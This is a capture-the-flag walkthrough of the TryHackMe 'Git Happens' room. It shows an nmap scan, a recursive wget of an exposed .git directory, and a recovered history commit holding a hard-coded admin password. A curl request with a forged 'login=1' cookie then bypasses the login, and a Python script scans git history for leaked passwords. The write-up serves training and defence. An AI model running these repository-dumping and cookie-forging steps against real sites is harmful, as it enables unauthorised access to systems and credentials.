Tryhackme: Git Happens — WalkThrough - CyberSec Nerds

Today we will be doing Git Happens from TryHackMe, a beginner-level room that aims to teach version control (git) misconfigurations and the stupid mistakes developers make that ultimately lead to serious security issues. Without further ado, let’s connect to the THM OpenVPN network and start hacking!!!

Port Scanning

┌──(kiran㉿kali)-[~]
└─$ nmap -sC -sV 10.10.201.254 -oA nmap 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 18:17 +0545
Nmap scan report for 10.10.201.254
Host is up (0.20s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.0 (Ubuntu)
| http-git:  
|   10.10.201.254:80/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Super Awesome Site!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nmap’s http-git script discovered a .git directory on the web root. Navigating to that URL in the browser gave the directory listing shown below.

.git Directory Listing

It looks like a git repository. Let’s download all the files and investigate locally.

$ wget http://10.10.191.151/.git/ --recursive --no-parent        
--2021-05-20 17:47:05--  http://10.10.191.151/.git/ 
Connecting to 10.10.191.151:80... connected. 
HTTP request sent, awaiting response... 200 OK 
Length: unspecified [text/html] 
Saving to: ‘10.10.191.151/.git/index.html’ 
<SNIP>

Port 80

There is a login page on port 80.

Analyzing the repository

Apart from the git directory structure, I couldn’t find any interesting files. Now let’s use git commands to see what exactly this repository is about. The command git status shows the current state of the repo.

┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ git status 
On branch master
Changes not staged for commit:
 (use "git add/rm <file>..." to update what will be committed)
 (use "git restore <file>..." to discard changes in working directory)
       deleted:    .gitlab-ci.yml
       deleted:    Dockerfile
       deleted:    README.md
       deleted:    css/style.css
       deleted:    dashboard.html
       deleted:    default.conf
       deleted:    index.html

no changes added to commit (use "git add" and/or "git commit -a")

We can see that quite a few files were recently deleted, but the deletions have not been committed. It’s possible to restore the files with the git restore <file> command. I restored the files index.html and dashboard.html and analyzed the source code. The JavaScript code was heavily obfuscated. There must be another way.

It’s time to analyze the logs. Let’s harness the true power of a version control system, i.e. going back in time.

┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]                                                                                                                 
└─$ git log                                                                                                                                
commit d0b3578a628889f38c0affb1b75457146a4678e5 (HEAD -> master, tag: v1.0)                                                                                             
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Thu Jul 23 22:22:16 2020 +0000

   Update .gitlab-ci.yml
<SNIP>
commit 395e087334d613d5e423cdf8f7be27196a360459
Author: Hydragyrum <hydragyrum@gmail.com>
Date:   Thu Jul 23 23:17:43 2020 +0200

   Made the login page, boss!

commit 2f423697bf81fe5956684f66fb6fc6596a1903cc
Author: Adam Bertrand <hydragyrum@gmail.com>
Date:   Mon Jul 20 20:46:28 2020 +0000

   Initial commit

Looking back through the log, there was a commit on July 23 where the login page had just been finished and the code had not yet been obfuscated. Let’s check out that earlier version of the code, i.e. commit 395e087334d613d5e423cdf8f7be27196a360459.

┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository] 
└─$ git checkout 395e087334d613d5e423cdf8f7be27196a360459  
D       README.md
Note: switching to '395e087334d613d5e423cdf8f7be27196a360459'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -c with the switch command. Example:

 git switch -c <new-branch-name>

Or undo this operation with:

 git switch -

Turn off this advice by setting config variable advice.detachedHead to false

HEAD is now at 395e087 Made the login page, boss!

┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository]
└─$ ls
css  dashboard.html  index.html

Analyzing the source code of index.html at that commit, the credentials to sign into the website had been left in cleartext.

   <script>
     function login() {
       let form = document.getElementById("login-form");
       console.log(form.elements);
       let username = form.elements["username"].value;
       let password = form.elements["password"].value;
       if (
         username === "admin" &&
         password === "<REDACTED>"
       ) {
         document.cookie = "login=1";
         window.location.href = "/dashboard.html";
       } else {
         document.getElementById("error").innerHTML =
           "INVALID USERNAME OR PASSWORD!";
       }
     }
   </script>
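The whole procedure above (dump the repository, walk the history, find the version that still carries the secret) is what a defender should run against their own repository before it ever reaches a web root. The following is an added example written for this walkthrough, not code from the room or its author: a pure-Python audit that reads a .git directory’s loose objects the way git log and git checkout do, resolves HEAD, follows the parent chain, and greps every file in every commit for a hard-coded password. It builds a constructed two-commit sample repository in a temporary directory (the password pattern, commit messages, file contents and author identity are all assumptions made for the example) so it runs offline.

```python
import hashlib, os, re, tempfile, zlib

# Constructed pattern for this example: a literal password compared in client-side JavaScript.
SECRET_RE = re.compile(rb'password\s*===?\s*"([^"]+)"')
def write_obj(gitdir, kind, data):
    # Store a loose object as git does: zlib("<type> <len>\0<data>"), named by its SHA-1.
    raw = b"%s %d\0" % (kind.encode(), len(data)) + data
    sha = hashlib.sha1(raw).hexdigest()
    os.makedirs(os.path.join(gitdir, "objects", sha[:2]), exist_ok=True)
    open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "wb").write(zlib.compress(raw))
    return sha

def read_obj(gitdir, sha):
    # Inverse of write_obj: the decompressed object body without its "<type> <len>\0" header.
    return zlib.decompress(open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "rb").read()).partition(b"\0")[2]
def blobs_in_tree(gitdir, tree_sha, prefix=""):
    # Tree entries are "<mode> <name>\0<20 raw SHA bytes>"; mode 40000 marks a subdirectory to recurse into.
    body = read_obj(gitdir, tree_sha)
    while body:
        meta, _, body = body.partition(b"\0")
        (mode, name), sha, body = meta.decode().split(" ", 1), body[:20].hex(), body[20:]
        yield from blobs_in_tree(gitdir, sha, prefix + name + "/") if mode.startswith("4") else [(prefix + name, sha)]
def audit_history(gitdir):
    # Resolve HEAD (symbolic "ref: ..." or a detached SHA) and follow the parent chain back to the root commit.
    head = open(os.path.join(gitdir, "HEAD")).read().split()
    sha, hits = (open(os.path.join(gitdir, head[1])).read().strip() if head[0] == "ref:" else head[0]), []
    while sha:
        headers, _, subject = read_obj(gitdir, sha).partition(b"\n\n")
        fields = dict(line.split(b" ", 1) for line in headers.splitlines())
        for path, blob in blobs_in_tree(gitdir, fields[b"tree"].decode()):
            for m in SECRET_RE.finditer(read_obj(gitdir, blob)):
                hits.append((sha[:7], subject.decode().strip(), path, m.group(1).decode()))
        sha = fields.get(b"parent", b"").decode()  # the root commit has no parent, so the walk ends
    return hits

def build_sample_repo():
    # Constructed sample in a temp dir: commit 1 ships a cleartext password, commit 2 swaps in an obfuscated bundle.
    gitdir = os.path.join(tempfile.mkdtemp(), ".git")
    def commit(tree, parent, subject):
        hdr = f"tree {tree}\n" + (f"parent {parent}\n" if parent else "") + "author D <d@x> 0 +0000\ncommitter D <d@x> 0 +0000\n"
        return write_obj(gitdir, "commit", f"{hdr}\n{subject}\n".encode())
    tree = lambda name, blob: write_obj(gitdir, "tree", b"100644 %s\0%s" % (name.encode(), bytes.fromhex(blob)))
    v1 = write_obj(gitdir, "blob", b'if (username === "admin" && password === "s3cr3t-example") {')
    v2 = write_obj(gitdir, "blob", b'eval(atob("...obfuscated bundle..."))')
    c1 = commit(tree("index.html", v1), None, "Add login page")
    c2 = commit(tree("index.html", v2), c1, "Obfuscate login page")
    os.makedirs(os.path.join(gitdir, "refs", "heads"), exist_ok=True)
    open(os.path.join(gitdir, "HEAD"), "w").write("ref: refs/heads/master\n")
    open(os.path.join(gitdir, "refs", "heads", "master"), "w").write(c2 + "\n")
    return gitdir
```

On the sample, HEAD is clean and only the older commit is reported, which is exactly why an obfuscation commit on top does not remove a leak. The reader handles loose objects only; a repository that has been repacked into .pack files needs git itself (e.g. git log -p) or a pack parser.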

After verifying the login, the JavaScript sets the cookie login=1. Let’s authenticate ourselves with this cookie to get access to dashboard.html.

┌──(kiran㉿kali)-[~/…/boxes/thm/Git Happens/repository] 
└─$ curl http://10.10.123.54/dashboard.html -H 'Cookie: login=1' -L   
<!DOCTYPE html>
<html lang="en">
 <head>
   <meta charset="UTF-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1.0" />
   <title>Awesome!</title>
   <link rel="stylesheet" href="/css/style.css" />
 </head>
 <body onload="checkCookie()">
   <p class="rainbow-text">Awesome! Use the password you input as the flag!</p>

As the page says, the password we recovered is the flag to be submitted for the challenge.

Happy Hacking!!

Kiran Dawadi

Founder of cybersecnerds.com. Electronics Engineer by profession, Security Engineer by passion. I am a Linux Enthusiast and highly interested in the offensive side of the CyberSec industry. You will find me reading InfoSec blogs most of the time.
